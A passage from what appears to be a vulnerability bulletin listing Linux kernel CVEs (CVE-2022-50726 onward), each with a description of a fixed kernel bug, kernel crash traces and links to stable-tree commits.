| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5: Fix possible use-after-free in async command interface mlx5_cmd_cleanup_async_ctx should return only after all its callback handlers were completed. Before this patch, the below race between mlx5_cmd_cleanup_async_ctx and mlx5_cmd_exec_cb_handler was possible and lead to a use-after-free: 1. mlx5_cmd_cleanup_async_ctx is called while num_inflight is 2 (i.e. elevated by 1, a single inflight callback). 2. mlx5_cmd_cleanup_async_ctx decreases num_inflight to 1. 3. mlx5_cmd_exec_cb_handler is called, decreases num_inflight to 0 and is about to call wake_up(). 4. mlx5_cmd_cleanup_async_ctx calls wait_event, which returns immediately as the condition (num_inflight == 0) holds. 5. mlx5_cmd_cleanup_async_ctx returns. 6. The caller of mlx5_cmd_cleanup_async_ctx frees the mlx5_async_ctx object. 7. mlx5_cmd_exec_cb_handler goes on and calls wake_up() on the freed object. Fix it by syncing using a completion object. Mark it completed when num_inflight reaches 0. Trace: BUG: KASAN: use-after-free in do_raw_spin_lock+0x23d/0x270 Read of size 4 at addr ffff888139cd12f4 by task swapper/5/0 CPU: 5 PID: 0 Comm: swapper/5 Not tainted 6.0.0-rc3_for_upstream_debug_2022_08_30_13_10 #1 Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014 Call Trace: <IRQ> dump_stack_lvl+0x57/0x7d print_report.cold+0x2d5/0x684 ? do_raw_spin_lock+0x23d/0x270 kasan_report+0xb1/0x1a0 ? do_raw_spin_lock+0x23d/0x270 do_raw_spin_lock+0x23d/0x270 ? rwlock_bug.part.0+0x90/0x90 ? __delete_object+0xb8/0x100 ? lock_downgrade+0x6e0/0x6e0 _raw_spin_lock_irqsave+0x43/0x60 ? __wake_up_common_lock+0xb9/0x140 __wake_up_common_lock+0xb9/0x140 ? __wake_up_common+0x650/0x650 ? destroy_tis_callback+0x53/0x70 [mlx5_core] ? kasan_set_track+0x21/0x30 ? destroy_tis_callback+0x53/0x70 [mlx5_core] ? kfree+0x1ba/0x520 ? do_raw_spin_unlock+0x54/0x220 mlx5_cmd_exec_cb_handler+0x136/0x1a0 [mlx5_core] ? mlx5_cmd_cleanup_async_ctx+0x220/0x220 [mlx5_core] ? mlx5_cmd_cleanup_async_ctx+0x220/0x220 [mlx5_core] mlx5_cmd_comp_handler+0x65a/0x12b0 [mlx5_core] ? dump_command+0xcc0/0xcc0 [mlx5_core] ? lockdep_hardirqs_on_prepare+0x400/0x400 ? cmd_comp_notifier+0x7e/0xb0 [mlx5_core] cmd_comp_notifier+0x7e/0xb0 [mlx5_core] atomic_notifier_call_chain+0xd7/0x1d0 mlx5_eq_async_int+0x3ce/0xa20 [mlx5_core] atomic_notifier_call_chain+0xd7/0x1d0 ? irq_release+0x140/0x140 [mlx5_core] irq_int_handler+0x19/0x30 [mlx5_core] __handle_irq_event_percpu+0x1f2/0x620 handle_irq_event+0xb2/0x1d0 handle_edge_irq+0x21e/0xb00 __common_interrupt+0x79/0x1a0 common_interrupt+0x78/0xa0 </IRQ> <TASK> asm_common_interrupt+0x22/0x40 RIP: 0010:default_idle+0x42/0x60 Code: c1 83 e0 07 48 c1 e9 03 83 c0 03 0f b6 14 11 38 d0 7c 04 84 d2 75 14 8b 05 eb 47 22 02 85 c0 7e 07 0f 00 2d e0 9f 48 00 fb f4 <c3> 48 c7 c7 80 08 7f 85 e8 d1 d3 3e fe eb de 66 66 2e 0f 1f 84 00 RSP: 0018:ffff888100dbfdf0 EFLAGS: 00000242 RAX: 0000000000000001 RBX: ffffffff84ecbd48 RCX: 1ffffffff0afe110 RDX: 0000000000000004 RSI: 0000000000000000 RDI: ffffffff835cc9bc RBP: 0000000000000005 R08: 0000000000000001 R09: ffff88881dec4ac3 R10: ffffed1103bd8958 R11: 0000017d0ca571c9 R12: 0000000000000005 R13: ffffffff84f024e0 R14: 0000000000000000 R15: dffffc0000000000 ? default_idle_call+0xcc/0x450 default_idle_call+0xec/0x450 do_idle+0x394/0x450 ? arch_cpu_idle_exit+0x40/0x40 ? do_idle+0x17/0x450 cpu_startup_entry+0x19/0x20 start_secondary+0x221/0x2b0 ? set_cpu_sibling_map+0x2070/0x2070 secondary_startup_64_no_verify+0xcd/0xdb </TASK> Allocated by task 49502: kasan_save_stack+0x1e/0x40 __kasan_kmalloc+0x81/0xa0 kvmalloc_node+0x48/0xe0 mlx5e_bulk_async_init+0x35/0x110 [mlx5_core] mlx5e_tls_priv_tx_list_cleanup+0x84/0x3e0 [mlx5_core] mlx5e_ktls_cleanup_tx+0x38f/0x760 [mlx5_core] mlx5e_cleanup_nic_tx+0xa7/0x100 [mlx5_core] mlx5e_detach_netdev+0x1c ---truncated--- | 2025-12-24 | not yet calculated | CVE-2022-50726 | https://git.kernel.org/stable/c/69dd3ad406c49aa69ce4852c15231ac56af8caf9 https://git.kernel.org/stable/c/bbcc06933f35651294ea1e963757502312c2171f https://git.kernel.org/stable/c/ab3de780c176bb91995c6166a576b370d9726e17 https://git.kernel.org/stable/c/0aa3ee1e4e5c9ed5dda11249450d609c3072c54e https://git.kernel.org/stable/c/bacd22df95147ed673bec4692ab2d4d585935241 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: efct: Fix possible memleak in efct_device_init() In efct_device_init(), when efct_scsi_reg_fc_transport() fails, efct_scsi_tgt_driver_exit() is not called to release memory for efct_scsi_tgt_driver_init() and causes memleak: unreferenced object 0xffff8881020ce000 (size 2048): comm "modprobe", pid 465, jiffies 4294928222 (age 55.872s) backtrace: [<0000000021a1ef1b>] kmalloc_trace+0x27/0x110 [<000000004c3ed51c>] target_register_template+0x4fd/0x7b0 [target_core_mod] [<00000000f3393296>] efct_scsi_tgt_driver_init+0x18/0x50 [efct] [<00000000115de533>] 0xffffffffc0d90011 [<00000000d608f646>] do_one_initcall+0xd0/0x4e0 [<0000000067828cf1>] do_init_module+0x1cc/0x6a0 ... | 2025-12-24 | not yet calculated | CVE-2022-50727 | https://git.kernel.org/stable/c/038359eeccffaf0de4c1c9c51ee19cc5649619a1 https://git.kernel.org/stable/c/0c6e6bb30229b1297ac0fd7ede2941d2322fc736 https://git.kernel.org/stable/c/c7e96168a8ca3be96c4959475164bef31115f07e https://git.kernel.org/stable/c/bb0cd225dd37df1f4a22e36dad59ff33178ecdfc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: s390/lcs: Fix return type of lcs_start_xmit() With clang's kernel control flow integrity (kCFI, CONFIG_CFI_CLANG), indirect call targets are validated against the expected function pointer prototype to make sure the call target is valid to help mitigate ROP attacks. If they are not identical, there is a failure at run time, which manifests as either a kernel panic or thread getting killed. A proposed warning in clang aims to catch these at compile time, which reveals: drivers/s390/net/lcs.c:2090:21: error: incompatible function pointer types initializing 'netdev_tx_t (*)(struct sk_buff *, struct net_device *)' (aka 'enum netdev_tx (*)(struct sk_buff *, struct net_device *)') with an expression of type 'int (struct sk_buff *, struct net_device *)' [-Werror,-Wincompatible-function-pointer-types-strict] .ndo_start_xmit = lcs_start_xmit, ^~~~~~~~~~~~~~ drivers/s390/net/lcs.c:2097:21: error: incompatible function pointer types initializing 'netdev_tx_t (*)(struct sk_buff *, struct net_device *)' (aka 'enum netdev_tx (*)(struct sk_buff *, struct net_device *)') with an expression of type 'int (struct sk_buff *, struct net_device *)' [-Werror,-Wincompatible-function-pointer-types-strict] .ndo_start_xmit = lcs_start_xmit, ^~~~~~~~~~~~~~ ->ndo_start_xmit() in 'struct net_device_ops' expects a return type of 'netdev_tx_t', not 'int'. Adjust the return type of lcs_start_xmit() to match the prototype's to resolve the warning and potential CFI failure, should s390 select ARCH_SUPPORTS_CFI_CLANG in the future. | 2025-12-24 | not yet calculated | CVE-2022-50728 | https://git.kernel.org/stable/c/7b4da3fcd513b8e67823eb80da37aad99b3339c1 https://git.kernel.org/stable/c/d49cc2b705711fb8fb849e7c660929b2100360b7 https://git.kernel.org/stable/c/e684215d8a903752e2b0cc946517fb61e57a880a https://git.kernel.org/stable/c/20022d551f2064a194d8e0acb6cd7a85094a17b2 https://git.kernel.org/stable/c/ebc3c77785dc8b5b626309c0032a38fbb139287a https://git.kernel.org/stable/c/5ad774fb823c24bbeb21a15a67103ea7a6f5b928 https://git.kernel.org/stable/c/69669820844f81a77b6db24b86581320ae4d17af https://git.kernel.org/stable/c/cda74cdc280ba35c8993e7517bac5c257ff36f18 https://git.kernel.org/stable/c/bb16db8393658e0978c3f0d30ae069e878264fa3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ksmbd: Fix resource leak in ksmbd_session_rpc_open() When ksmbd_rpc_open() fails then it must call ksmbd_rpc_id_free() to undo the result of ksmbd_ipc_id_alloc(). | 2025-12-24 | not yet calculated | CVE-2022-50729 | https://git.kernel.org/stable/c/31c1b5d3000cdff70b98d5af045271e09079bec1 https://git.kernel.org/stable/c/9cb49b95c05df09b369d1ec1f378b5c92109433c https://git.kernel.org/stable/c/f9ed133381eba883c5e0059063d5b3ca7cac6d41 https://git.kernel.org/stable/c/bc044414fa0326a4e5c3c509c00b1fcaf621b5f4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: silence the warning when evicting inode with dioread_nolock When evicting an inode with default dioread_nolock, it could be raced by the unwritten extents converting kworker after writeback some new allocated dirty blocks. It convert unwritten extents to written, the extents could be merged to upper level and free extent blocks, so it could mark the inode dirty again even this inode has been marked I_FREEING. But the inode->i_io_list check and warning in ext4_evict_inode() missing this corner case. Fortunately, ext4_evict_inode() will wait all extents converting finished before this check, so it will not lead to inode use-after-free problem, every thing is OK besides this warning. The WARN_ON_ONCE was originally designed for finding inode use-after-free issues in advance, but if we add current dioread_nolock case in, it will become not quite useful, so fix this warning by just remove this check. ====== WARNING: CPU: 7 PID: 1092 at fs/ext4/inode.c:227 ext4_evict_inode+0x875/0xc60 ... RIP: 0010:ext4_evict_inode+0x875/0xc60 ... Call Trace: <TASK> evict+0x11c/0x2b0 iput+0x236/0x3a0 do_unlinkat+0x1b4/0x490 __x64_sys_unlinkat+0x4c/0xb0 do_syscall_64+0x3b/0x90 entry_SYSCALL_64_after_hwframe+0x46/0xb0 RIP: 0033:0x7fa933c1115b ====== rm kworker ext4_end_io_end() vfs_unlink() ext4_unlink() ext4_convert_unwritten_io_end_vec() ext4_convert_unwritten_extents() ext4_map_blocks() ext4_ext_map_blocks() ext4_ext_try_to_merge_up() __mark_inode_dirty() check !I_FREEING locked_inode_to_wb_and_lock_list() iput() iput_final() evict() ext4_evict_inode() truncate_inode_pages_final() //wait release io_end inode_io_list_move_locked() ext4_release_io_end() trigger WARN_ON_ONCE() | 2025-12-24 | not yet calculated | CVE-2022-50730 | https://git.kernel.org/stable/c/bdc698ce91f232fd5eb11d2373e9f82f687314b8 https://git.kernel.org/stable/c/0d041b7251c13679a0f6c7926751ce1d8a7237c1 https://git.kernel.org/stable/c/3b893cc9a8d8b4e486a6639f5e107b56b7197d2e https://git.kernel.org/stable/c/b085fb43feede48ebf80ab7e2dd150c8d9902932 https://git.kernel.org/stable/c/bc12ac98ea2e1b70adc6478c8b473a0003b659d3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: akcipher - default implementation for setting a private key Changes from v1: * removed the default implementation from set_pub_key: it is assumed that an implementation must always have this callback defined as there are no use case for an algorithm, which doesn't need a public key Many akcipher implementations (like ECDSA) support only signature verifications, so they don't have all callbacks defined. Commit 78a0324f4a53 ("crypto: akcipher - default implementations for request callbacks") introduced default callbacks for sign/verify operations, which just return an error code. However, these are not enough, because before calling sign the caller would likely call set_priv_key first on the instantiated transform (as the in-kernel testmgr does). This function does not have a default stub, so the kernel crashes, when trying to set a private key on an akcipher, which doesn't support signature generation. I've noticed this, when trying to add a KAT vector for ECDSA signature to the testmgr. With this patch the testmgr returns an error in dmesg (as it should) instead of crashing the kernel NULL ptr dereference. | 2025-12-24 | not yet calculated | CVE-2022-50731 | https://git.kernel.org/stable/c/95c4e20adc3ea00d1594a2a05d9b187ed12ffa8e https://git.kernel.org/stable/c/a1354bdd191d533211b7cb723aa76a66f516f197 https://git.kernel.org/stable/c/779a9930f3e152c82699feb389a0e6d6644e747e https://git.kernel.org/stable/c/85bc736a18b872f54912e8bb70682d11770aece0 https://git.kernel.org/stable/c/f9058178597059d6307efe96a7916600f8ede08c https://git.kernel.org/stable/c/bc155c6c188c2f0c5749993b1405673d25a80389 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: staging: rtl8192u: Fix use after free in ieee80211_rx() We cannot dereference the "skb" pointer after calling ieee80211_monitor_rx(), because it is a use after free. | 2025-12-24 | not yet calculated | CVE-2022-50732 | https://git.kernel.org/stable/c/9c03db0ec84b7964a11b20706665c99a5fead332 https://git.kernel.org/stable/c/fdc62d31d50e4ce5d8f363fcb8299ba0e00ee6fd https://git.kernel.org/stable/c/a0df8d44b555ae09729d6533fd4532977563c7b9 https://git.kernel.org/stable/c/288ada16a93aab5aa2ebea8190aafdb35b716854 https://git.kernel.org/stable/c/daa8045a991363ccdae5615d170f35aa1135e7a7 https://git.kernel.org/stable/c/b0aaec894a909c88117c8bda6c7c9b26cf7c744b https://git.kernel.org/stable/c/de174163c0d319ff06d622e79130a0017c8f5a6e https://git.kernel.org/stable/c/73df1172bbcc8d45cd28e3b1a9ca2edb2f9f7ce6 https://git.kernel.org/stable/c/bcc5e2dcf09089b337b76fc1a589f6ff95ca19ac |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: idmouse: fix an uninit-value in idmouse_open In idmouse_create_image, if any ftip_command fails, it will go to the reset label. However, this leads to the data in bulk_in_buffer[HEADER..IMGSIZE] uninitialized. And the check for valid image incurs an uninitialized dereference. Fix this by moving the check before reset label since this check only be valid if the data after bulk_in_buffer[HEADER] has concrete data. Note that this is found by KMSAN, so only kernel compilation is tested. | 2025-12-24 | not yet calculated | CVE-2022-50733 | https://git.kernel.org/stable/c/b3304a6df957cc89a0590cb505388d659bf3db4c https://git.kernel.org/stable/c/7dad42032f68718259590b0cc7654e9a95ff9762 https://git.kernel.org/stable/c/f589b667567fde4f81d6e6c40f42b9f2224690ea https://git.kernel.org/stable/c/1eae30c0113dde7522088231584d62415011a035 https://git.kernel.org/stable/c/b8bbae3236ab7dccc66c42bc3f7cdbcfc0786e54 https://git.kernel.org/stable/c/20b8c456df584ebb2387dc23d40ebe4ff334417c https://git.kernel.org/stable/c/6163a5ae097bc78fa26c243fb384537e25610fd7 https://git.kernel.org/stable/c/adad163d1cff248a5df9f7cec50158e6ca89f33b https://git.kernel.org/stable/c/bce2b0539933e485d22d6f6f076c0fcd6f185c4c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nvmem: core: Fix memleak in nvmem_register() dev_set_name will alloc memory for nvmem->dev.kobj.name in nvmem_register, when nvmem_validate_keepouts failed, nvmem's memory will be freed and return, but nobody will free memory for nvmem->dev.kobj.name, there will be memleak, so moving nvmem_validate_keepouts() after device_register() and let the device core deal with cleaning name in error cases. | 2025-12-24 | not yet calculated | CVE-2022-50734 | https://git.kernel.org/stable/c/9391cc3a787a58aa224a6440d7f244d780ba2896 https://git.kernel.org/stable/c/2bd2774df0ce37920b23819a860a66fdbdd90823 https://git.kernel.org/stable/c/b6054b9b239a493672f853b034570cca93ba7a88 https://git.kernel.org/stable/c/bd1244561fa2a4531ded40dbf09c9599084f8b29 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: mt76: do not run mt76u_status_worker if the device is not running Fix the following NULL pointer dereference avoiding to run mt76u_status_worker thread if the device is not running yet. KASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007] CPU: 0 PID: 98 Comm: kworker/u2:2 Not tainted 5.14.0+ #78 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.12.1-0-ga5cab58e9a3f-prebuilt.qemu.org 04/01/2014 Workqueue: mt76 mt76u_tx_status_data RIP: 0010:mt76x02_mac_fill_tx_status.isra.0+0x82c/0x9e0 Code: c5 48 b8 00 00 00 00 00 fc ff df 80 3c 02 00 0f 85 94 01 00 00 48 b8 00 00 00 00 00 fc ff df 4d 8b 34 24 4c 89 f2 48 c1 ea 03 <0f> b6 04 02 84 c0 74 08 3c 03 0f 8e 89 01 00 00 41 8b 16 41 0f b7 RSP: 0018:ffffc900005af988 EFLAGS: 00010246 RAX: dffffc0000000000 RBX: ffffc900005afae8 RCX: 0000000000000000 RDX: 0000000000000000 RSI: ffffffff832fc661 RDI: ffffc900005afc2a RBP: ffffc900005afae0 R08: 0000000000000001 R09: fffff520000b5f3c R10: 0000000000000003 R11: fffff520000b5f3b R12: ffff88810b6132d8 R13: 000000000000ffff R14: 0000000000000000 R15: ffffc900005afc28 FS: 0000000000000000(0000) GS:ffff88811aa00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007fa0eda6a000 CR3: 0000000118f17000 CR4: 0000000000750ef0 PKRU: 55555554 Call Trace: mt76x02_send_tx_status+0x1d2/0xeb0 mt76x02_tx_status_data+0x8e/0xd0 mt76u_tx_status_data+0xe1/0x240 process_one_work+0x92b/0x1460 worker_thread+0x95/0xe00 kthread+0x3a1/0x480 ret_from_fork+0x1f/0x30 Modules linked in: --[ end trace 8df5d20fc5040f65 ]-- RIP: 0010:mt76x02_mac_fill_tx_status.isra.0+0x82c/0x9e0 Code: c5 48 b8 00 00 00 00 00 fc ff df 80 3c 02 00 0f 85 94 01 00 00 48 b8 00 00 00 00 00 fc ff df 4d 8b 34 24 4c 89 f2 48 c1 ea 03 <0f> b6 04 02 84 c0 74 08 3c 03 0f 8e 89 01 00 00 41 8b 16 41 0f b7 RSP: 0018:ffffc900005af988 EFLAGS: 00010246 RAX: dffffc0000000000 RBX: ffffc900005afae8 RCX: 0000000000000000 RDX: 0000000000000000 RSI: ffffffff832fc661 RDI: ffffc900005afc2a RBP: ffffc900005afae0 R08: 0000000000000001 R09: fffff520000b5f3c R10: 0000000000000003 R11: fffff520000b5f3b R12: ffff88810b6132d8 R13: 000000000000ffff R14: 0000000000000000 R15: ffffc900005afc28 FS: 0000000000000000(0000) GS:ffff88811aa00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007fa0eda6a000 CR3: 0000000118f17000 CR4: 0000000000750ef0 PKRU: 55555554 Moreover move stat_work schedule out of the for loop. | 2025-12-24 | not yet calculated | CVE-2022-50735 | https://git.kernel.org/stable/c/69346de0eb956fb92949b9473de4647d9c34a54f https://git.kernel.org/stable/c/58fdd84a89b121b761dbfb8a196356e007376ca4 https://git.kernel.org/stable/c/f5ac749a0b21beee55d87d0b05de36976b22dff9 https://git.kernel.org/stable/c/bd5dac7ced5a7c9faa4dc468ac9560c3256df845 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/siw: Fix immediate work request flush to completion queue Correctly set send queue element opcode during immediate work request flushing in post sendqueue operation, if the QP is in ERROR state. An undefined ocode value results in out-of-bounds access to an array for mapping the opcode between siw internal and RDMA core representation in work completion generation. It resulted in a KASAN BUG report of type 'global-out-of-bounds' during NFSoRDMA testing. This patch further fixes a potential case of a malicious user which may write undefined values for completion queue elements status or opcode, if the CQ is memory mapped to user land. It avoids the same out-of-bounds access to arrays for status and opcode mapping as described above. | 2025-12-24 | not yet calculated | CVE-2022-50736 | https://git.kernel.org/stable/c/6af043089d3f1210776d19b6fdabea610d4c7699 https://git.kernel.org/stable/c/75af03fdf35acf15a3977f7115f6b8d10dff4bc7 https://git.kernel.org/stable/c/f8d8fbd3b6d6cc3f25790cca5cffe8ded512fef6 https://git.kernel.org/stable/c/355d2eca68c10d713a42f68e62044b3d1c300471 https://git.kernel.org/stable/c/f3d26a8589dfdeff328779b511f71fb90b10005e https://git.kernel.org/stable/c/bdf1da5df9da680589a7f74448dd0a94dd3e1446 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/ntfs3: Validate index root when initialize NTFS security This enhances the sanity check for $SDH and $SII while initializing NTFS security, guarantees these index root are legit. [ 162.459513] BUG: KASAN: use-after-free in hdr_find_e.isra.0+0x10c/0x320 [ 162.460176] Read of size 2 at addr ffff8880037bca99 by task mount/243 [ 162.460851] [ 162.461252] CPU: 0 PID: 243 Comm: mount Not tainted 6.0.0-rc7 #42 [ 162.461744] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.14.0-0-g155821a1990b-prebuilt.qemu.org 04/01/2014 [ 162.462609] Call Trace: [ 162.462954] <TASK> [ 162.463276] dump_stack_lvl+0x49/0x63 [ 162.463822] print_report.cold+0xf5/0x689 [ 162.464608] ? unwind_get_return_address+0x3a/0x60 [ 162.465766] ? hdr_find_e.isra.0+0x10c/0x320 [ 162.466975] kasan_report+0xa7/0x130 [ 162.467506] ? _raw_spin_lock_irq+0xc0/0xf0 [ 162.467998] ? hdr_find_e.isra.0+0x10c/0x320 [ 162.468536] __asan_load2+0x68/0x90 [ 162.468923] hdr_find_e.isra.0+0x10c/0x320 [ 162.469282] ? cmp_uints+0xe0/0xe0 [ 162.469557] ? cmp_sdh+0x90/0x90 [ 162.469864] ? ni_find_attr+0x214/0x300 [ 162.470217] ? ni_load_mi+0x80/0x80 [ 162.470479] ? entry_SYSCALL_64_after_hwframe+0x63/0xcd [ 162.470931] ? ntfs_bread_run+0x190/0x190 [ 162.471307] ? indx_get_root+0xe4/0x190 [ 162.471556] ? indx_get_root+0x140/0x190 [ 162.471833] ? indx_init+0x1e0/0x1e0 [ 162.472069] ? fnd_clear+0x115/0x140 [ 162.472363] ? _raw_spin_lock_irqsave+0x100/0x100 [ 162.472731] indx_find+0x184/0x470 [ 162.473461] ? sysvec_apic_timer_interrupt+0x57/0xc0 [ 162.474429] ? indx_find_buffer+0x2d0/0x2d0 [ 162.474704] ? do_syscall_64+0x3b/0x90 [ 162.474962] dir_search_u+0x196/0x2f0 [ 162.475381] ? ntfs_nls_to_utf16+0x450/0x450 [ 162.475661] ? ntfs_security_init+0x3d6/0x440 [ 162.475906] ? is_sd_valid+0x180/0x180 [ 162.476191] ntfs_extend_init+0x13f/0x2c0 [ 162.476496] ? ntfs_fix_post_read+0x130/0x130 [ 162.476861] ? iput.part.0+0x286/0x320 [ 162.477325] ntfs_fill_super+0x11e0/0x1b50 [ 162.477709] ? put_ntfs+0x1d0/0x1d0 [ 162.477970] ? vsprintf+0x20/0x20 [ 162.478258] ? set_blocksize+0x95/0x150 [ 162.478538] get_tree_bdev+0x232/0x370 [ 162.478789] ? put_ntfs+0x1d0/0x1d0 [ 162.479038] ntfs_fs_get_tree+0x15/0x20 [ 162.479374] vfs_get_tree+0x4c/0x130 [ 162.479729] path_mount+0x654/0xfe0 [ 162.480124] ? putname+0x80/0xa0 [ 162.480484] ? finish_automount+0x2e0/0x2e0 [ 162.480894] ? putname+0x80/0xa0 [ 162.481467] ? kmem_cache_free+0x1c4/0x440 [ 162.482280] ? putname+0x80/0xa0 [ 162.482714] do_mount+0xd6/0xf0 [ 162.483264] ? path_mount+0xfe0/0xfe0 [ 162.484782] ? __kasan_check_write+0x14/0x20 [ 162.485593] __x64_sys_mount+0xca/0x110 [ 162.486024] do_syscall_64+0x3b/0x90 [ 162.486543] entry_SYSCALL_64_after_hwframe+0x63/0xcd [ 162.487141] RIP: 0033:0x7f9d374e948a [ 162.488324] Code: 48 8b 0d 11 fa 2a 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 a5 00 00 008 [ 162.489728] RSP: 002b:00007ffe30e73d18 EFLAGS: 00000206 ORIG_RAX: 00000000000000a5 [ 162.490971] RAX: ffffffffffffffda RBX: 0000561cdb43a060 RCX: 00007f9d374e948a [ 162.491669] RDX: 0000561cdb43a260 RSI: 0000561cdb43a2e0 RDI: 0000561cdb442af0 [ 162.492050] RBP: 0000000000000000 R08: 0000561cdb43a280 R09: 0000000000000020 [ 162.492459] R10: 00000000c0ed0000 R11: 0000000000000206 R12: 0000561cdb442af0 [ 162.493183] R13: 0000561cdb43a260 R14: 0000000000000000 R15: 00000000ffffffff [ 162.493644] </TASK> [ 162.493908] [ 162.494214] The buggy address belongs to the physical page: [ 162.494761] page:000000003e38a3d5 refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x37bc [ 162.496064] flags: 0xfffffc0000000(node=0|zone=1|lastcpupid=0x1fffff) [ 162.497278] raw: 000fffffc0000000 ffffea00000df1c8 ffffea00000df008 0000000000000000 [ 162.498928] raw: 0000000000000000 0000000000240000 0 ---truncated--- | 2025-12-24 | not yet calculated | CVE-2022-50737 | https://git.kernel.org/stable/c/d7ce7bb6881aae186e50f57eea935cff8d504751 https://git.kernel.org/stable/c/24ee53c6bce15500db22f2a7aee9dd830e806c90 https://git.kernel.org/stable/c/d6379ce242960a8e9ecd6ff76f476d9336c21f16 https://git.kernel.org/stable/c/bfcdbae0523bd95eb75a739ffb6221a37109881e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: vhost-vdpa: fix an iotlb memory leak Before commit 3d5698793897 ("vhost-vdpa: introduce asid based IOTLB") we called vhost_vdpa_iotlb_unmap(v, iotlb, 0ULL, 0ULL - 1) during release to free all the resources allocated when processing user IOTLB messages through vhost_vdpa_process_iotlb_update(). That commit changed the handling of IOTLB a bit, and we accidentally removed some code called during the release. We partially fixed this with commit 037d4305569a ("vhost-vdpa: call vhost_vdpa_cleanup during the release") but a potential memory leak is still there as showed by kmemleak if the application does not send VHOST_IOTLB_INVALIDATE or crashes: unreferenced object 0xffff888007fbaa30 (size 16): comm "blkio-bench", pid 914, jiffies 4294993521 (age 885.500s) hex dump (first 16 bytes): 40 73 41 07 80 88 ff ff 00 00 00 00 00 00 00 00 @sA............. backtrace: [<0000000087736d2a>] kmem_cache_alloc_trace+0x142/0x1c0 [<0000000060740f50>] vhost_vdpa_process_iotlb_msg+0x68c/0x901 [vhost_vdpa] [<0000000083e8e205>] vhost_chr_write_iter+0xc0/0x4a0 [vhost] [<000000008f2f414a>] vhost_vdpa_chr_write_iter+0x18/0x20 [vhost_vdpa] [<00000000de1cd4a0>] vfs_write+0x216/0x4b0 [<00000000a2850200>] ksys_write+0x71/0xf0 [<00000000de8e720b>] __x64_sys_write+0x19/0x20 [<0000000018b12cbb>] do_syscall_64+0x3f/0x90 [<00000000986ec465>] entry_SYSCALL_64_after_hwframe+0x63/0xcd Let's fix this calling vhost_vdpa_iotlb_unmap() on the whole range in vhost_vdpa_remove_as(). We move that call before vhost_dev_cleanup() since we need a valid v->vdev.mm in vhost_vdpa_pa_unmap(). vhost_iotlb_reset() call can be removed, since vhost_vdpa_iotlb_unmap() on the whole range removes all the entries. The kmemleak log reported was observed with a vDPA device that has `use_va` set to true (e.g. VDUSE). This patch has been tested with both types of devices. | 2025-12-24 | not yet calculated | CVE-2022-50738 | https://git.kernel.org/stable/c/4e92cb33bfb51eee5f28bb10846c46f266a4bb67 https://git.kernel.org/stable/c/a2907867e2c86067accd2f011d6f23ee5533aa6c https://git.kernel.org/stable/c/c070c1912a83432530cbb4271d5b9b11fa36b67a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/ntfs3: Add null pointer check for inode operations This adds a sanity check for the i_op pointer of the inode which is returned after reading Root directory MFT record. We should check the i_op is valid before trying to create the root dentry, otherwise we may encounter a NPD while mounting a image with a funny Root directory MFT record. [ 114.484325] BUG: kernel NULL pointer dereference, address: 0000000000000008 [ 114.484811] #PF: supervisor read access in kernel mode [ 114.485084] #PF: error_code(0x0000) - not-present page [ 114.485606] PGD 0 P4D 0 [ 114.485975] Oops: 0000 [#1] PREEMPT SMP KASAN NOPTI [ 114.486570] CPU: 0 PID: 237 Comm: mount Tainted: G B 6.0.0-rc4 #28 [ 114.486977] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.14.0-0-g155821a1990b-prebuilt.qemu.org 04/01/2014 [ 114.488169] RIP: 0010:d_flags_for_inode+0xe0/0x110 [ 114.488816] Code: 24 f7 ff 49 83 3e 00 74 41 41 83 cd 02 66 44 89 6b 02 eb 92 48 8d 7b 20 e8 6d 24 f7 ff 4c 8b 73 20 49 8d 7e 08 e8 60 241 [ 114.490326] RSP: 0018:ffff8880065e7aa8 EFLAGS: 00000296 [ 114.490695] RAX: 0000000000000001 RBX: ffff888008ccd750 RCX: ffffffff84af2aea [ 114.490986] RDX: 0000000000000001 RSI: 0000000000000008 RDI: ffffffff87abd020 [ 114.491364] RBP: ffff8880065e7ac8 R08: 0000000000000001 R09: fffffbfff0f57a05 [ 114.491675] R10: ffffffff87abd027 R11: fffffbfff0f57a04 R12: 0000000000000000 [ 114.491954] R13: 0000000000000008 R14: 0000000000000000 R15: ffff888008ccd750 [ 114.492397] FS: 00007fdc8a627e40(0000) GS:ffff888058200000(0000) knlGS:0000000000000000 [ 114.492797] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 114.493150] CR2: 0000000000000008 CR3: 00000000013ba000 CR4: 00000000000006f0 [ 114.493671] Call Trace: [ 114.493890] <TASK> [ 114.494075] __d_instantiate+0x24/0x1c0 [ 114.494505] d_instantiate.part.0+0x35/0x50 [ 114.494754] d_make_root+0x53/0x80 [ 114.494998] ntfs_fill_super+0x1232/0x1b50 [ 114.495260] ? put_ntfs+0x1d0/0x1d0 [ 114.495499] ? vsprintf+0x20/0x20 [ 114.495723] ? set_blocksize+0x95/0x150 [ 114.495964] get_tree_bdev+0x232/0x370 [ 114.496272] ? put_ntfs+0x1d0/0x1d0 [ 114.496502] ntfs_fs_get_tree+0x15/0x20 [ 